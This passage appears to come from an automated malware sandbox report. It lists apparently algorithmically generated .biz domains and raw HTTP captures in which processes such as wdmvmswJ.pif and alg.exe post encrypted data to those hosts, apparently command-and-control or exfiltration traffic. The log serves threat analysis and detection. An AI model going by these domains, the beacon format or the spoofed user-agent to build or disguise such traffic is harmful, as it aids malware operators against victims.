                                                                                                                                                                                                                                                                                                                                                                                                                        • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        • giliplg.biz

                                                                                                                                                                                                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        0192.168.2.84970854.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.084994078 CET356OUTPOST /xvpanbchxym HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.084994078 CET802OUTData Raw: 86 4c 25 c6 52 95 85 38 16 03 00 00 46 44 6f 17 9b 2b 73 9a c3 f5 97 ca bc 1c 11 c8 49 bc 2a e6 2a 07 d6 68 b2 dd 34 f3 db ae 43 7e 39 21 86 bb 9c 49 99 95 b9 a6 47 af 7d f9 e4 5f f2 62 f5 a0 e6 07 2d 4d 3a d6 df 74 91 07 95 7b e9 1a 63 b2 59 2a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: L%R8FDo+sI**h4C~9!IG}_b-M:t{cY*:L2gr:&%c3b+Gl&-AIq*ivfxi?]t$ye-R|ry<h`pwo:sd>}r,d|9?k\mCV.P6
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:23.911797047 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3705e2d25959b713d271882e99f285a5|173.254.250.82|1730445803|1730445803|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        1192.168.2.84970918.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.313709974 CET345OUTPOST /ks HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.313756943 CET802OUTData Raw: 45 12 0c ad 12 39 2e bf 16 03 00 00 7a ef c4 0e f5 87 c9 9b 6c a6 60 07 d1 21 91 61 a1 44 37 53 dd 7d 6a 0c 07 55 2d c0 16 ef 1d af 3d 64 82 8a 90 b0 16 86 49 d6 f2 86 4f 7f 1d fa eb 48 f2 67 bd 27 9c 83 b4 36 cf 5c ca 17 e3 dc 70 90 40 fc dc e4
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E9.zl`!aD7S}jU-=dIOHg'6\p@l%L,B{}6sDV)^[DML~n~4Zd:|-3bC;+*)_><[Z; $pEs=iILY
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.732438087 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=eca8a85f2a5723dd7cdeb3c0755f29e9|173.254.250.82|1730445805|1730445805|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        2192.168.2.84971054.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.769313097 CET355OUTPOST /iwwaryskplxdjo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.769336939 CET802OUTData Raw: 7d 8c c5 5c 87 24 20 26 16 03 00 00 21 3a b0 2b 71 4f 0e 03 ca ec 0c d8 20 e7 18 30 d9 4a ee 08 d6 29 d4 3e 1a 08 c9 69 09 28 b5 d8 57 6d 3c 73 0a 71 33 2f a9 8f ab b3 d4 07 67 80 71 9d 6f db 42 0f 39 74 df eb e9 8e 30 70 e9 6a 19 ee 7d e9 d8 d0
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }\$ &!:+qO 0J)>i(Wm<sq3/gqoB9t0pj}1ZrX6<P>@UEv,A(T`t"AijpuMQC>'m bLao1W9*jCpKE\uTv.nL+3S+cV
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.609052896 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5d603b1984930fa91fc5ef21e8902be6|173.254.250.82|1730445806|1730445806|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        3192.168.2.84971144.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829791069 CET357OUTPOST /ludmpidgkyjmk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.829807043 CET802OUTData Raw: a0 73 e5 41 c5 64 31 3c 16 03 00 00 b3 d0 e4 a9 85 d8 db 32 9c f1 80 cb 20 e0 a2 ca 5b 86 d2 98 14 5d ae 17 ff f8 23 16 c9 60 c7 52 3e 70 6b 17 b8 06 e2 ea ca a9 d0 d5 92 43 11 bd a2 e4 69 65 b7 82 fa 5a 88 0d 62 da 33 3d 8b ec a1 bf 3a 24 21 db
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: sAd1<2 []#`R>pkCieZb3=:$!0290hPJJ=$V02}-8q@jWkMl&*.fD^{z>@DoQR6bEbK9JEC$[svgR+SF@zgU=_P_u3O
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.526943922 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8199c0f6484ce44907bc3498dfff43a9|173.254.250.82|1730445808|1730445808|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        4192.168.2.84971254.244.188.177804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.273194075 CET346OUTPOST /i HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.273282051 CET778OUTData Raw: be bc 51 97 a6 02 bf ca fe 02 00 00 39 b6 36 80 7f e8 6f eb b1 61 11 1b a4 04 dc 6a bc a6 6d 8b da 9e a7 7e 9f 1e 1b 7e ea ac aa 13 0f ea b4 20 78 8c 5b 55 cd 1b 48 d2 c0 ec 2b 12 0b c9 77 04 96 22 d7 df 17 e9 fc 38 b4 48 84 ea 61 d0 9e e9 ac 3b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Q96oajm~~ x[UH+w"8Ha;EfJgQK"\V@*k.xIF-.qqD!UO;)A~nDXmI}Z)bZ>?KH_Db54|]
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.113450050 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=edcde14c2557f0bc429541d9545c3e3f|173.254.250.82|1730445807|1730445807|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        5192.168.2.849713172.234.222.138804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562653065 CET359OUTPOST /pywymqfnuombtvtm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.562680006 CET802OUTData Raw: f3 e2 41 90 8e 46 b6 91 16 03 00 00 8c c3 68 7a 95 ef cd 14 7a 0d 74 3b 9e 91 35 44 c6 59 81 60 4e 89 db 7a f9 7b 2d d4 4e d6 55 6b 42 e2 f6 c8 51 08 7c 74 77 d6 16 19 d5 b4 e6 a8 e4 38 b2 31 8b f7 b8 1f 57 14 22 c8 4a fb 75 97 9d c0 60 10 87 2d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: AFhzzt;5DY`Nz{-NUkBQ|tw81W"Ju`-O[$>zg5(dj o`2lv8~Ua?s&Wcu}>Wq6]F>sZw)"^D f*fM|" tsJ`{QzS\--


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        6192.168.2.84971418.141.10.107804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571266890 CET351OUTPOST /luqhjxxa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.571294069 CET778OUTData Raw: 5f 10 4f d1 f9 27 9d 6d fe 02 00 00 46 f9 54 57 b9 8d d9 a9 87 e9 40 2d f6 45 43 d8 9a b2 83 ae 02 e9 07 59 67 3c ff 41 4e 16 91 ae 4f c4 33 13 d1 b8 5f a1 33 df 73 17 44 f7 4f d3 fa e4 84 24 86 87 bf b6 ab 20 5f 75 8d d3 86 bd b7 39 93 73 85 01
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _O'mFTW@-ECYg<ANO3_3sDO$ _u9sbxN`uyx{Jwc\ ZAu\g/B?1f,Qfv7dK=Pj[%"Vx=povMy!u|(P
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.006846905 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=66f145c819b8cb61bd6f5bc4980c7d8b|173.254.250.82|1730445809|1730445809|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        7192.168.2.849715172.234.222.138804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.261008024 CET346OUTPOST /fnl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.261022091 CET802OUTData Raw: 02 a4 cc 97 1f c0 65 4e 16 03 00 00 58 f0 3a a4 a4 ea 82 9c d5 db 66 49 c8 34 ca fa 18 4f 01 bd 89 a4 1d 51 83 50 2c 2f de 70 05 49 fb c0 88 24 d5 0f 1d da 0e 19 6b 46 5e bc 5a 74 c0 f1 08 52 d7 81 19 77 14 32 c1 2a d7 db 3b 11 12 bd 37 c7 f4 c1
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: eNX:fI4OQP,/pI$kF^ZtRw2*;7&|`3#=-@(gD/5B7G*wN+~8cfrvpXlL( dZU!U]&g>]g XdH: `+dzVRwh)<N


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        8192.168.2.84971718.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951155901 CET346OUTPOST /ln HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.951333046 CET802OUTData Raw: 11 67 57 9e af 3a 14 0a 16 03 00 00 ae 72 e6 4b 47 0e 22 12 ec 09 ad ab c9 c8 61 ee 9c e0 e0 c6 75 36 46 1e 59 2b 38 d2 8c a1 d1 8e ed 94 b6 79 97 a9 2b e7 65 0a f3 45 46 45 63 76 68 e8 5a 9f d9 f7 8d 69 c9 dc eb 62 60 ac db 5f b3 49 f9 77 df 6b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: gW:rKG"au6FY+8y+eEFEcvhZib`_Iwkc%&pe*k6WOj5=jUo pwaQk/&(REkIliYHwM_Kr;|J!H`)3H#ol,IK[Tj


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        9192.168.2.84971854.244.188.177804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.160603046 CET353OUTPOST /uqcynitxoaix HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.160624027 CET778OUTData Raw: 81 e9 2e 96 a7 c3 f4 86 fe 02 00 00 77 4d 18 77 b0 24 74 3a 42 c2 eb 91 2c 19 e7 a2 4d cb 34 5f 4d fb 0d e3 55 9d 56 37 a8 44 8e 9a 6e 55 6b ea 18 f8 d2 c8 09 8d 7e 23 e1 f4 71 29 a4 2c 90 27 bf 3a a2 bb 5b b4 07 92 24 06 7e 2c 73 e6 68 c3 79 c3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .wMw$t:B,M4_MUV7DnUk~#q),':[$~,shyIM+oVho4.I$O;o;'4al;gVI6Q["h,'v8_vc;@&XkJ)fOvG)%jlpL;(\/Ff:OVbhuU
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.989990950 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c0adb617a4fb2bf862e9419cb10d0c00|173.254.250.82|1730445810|1730445810|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        10192.168.2.84972118.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.061543941 CET347OUTPOST /rlj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
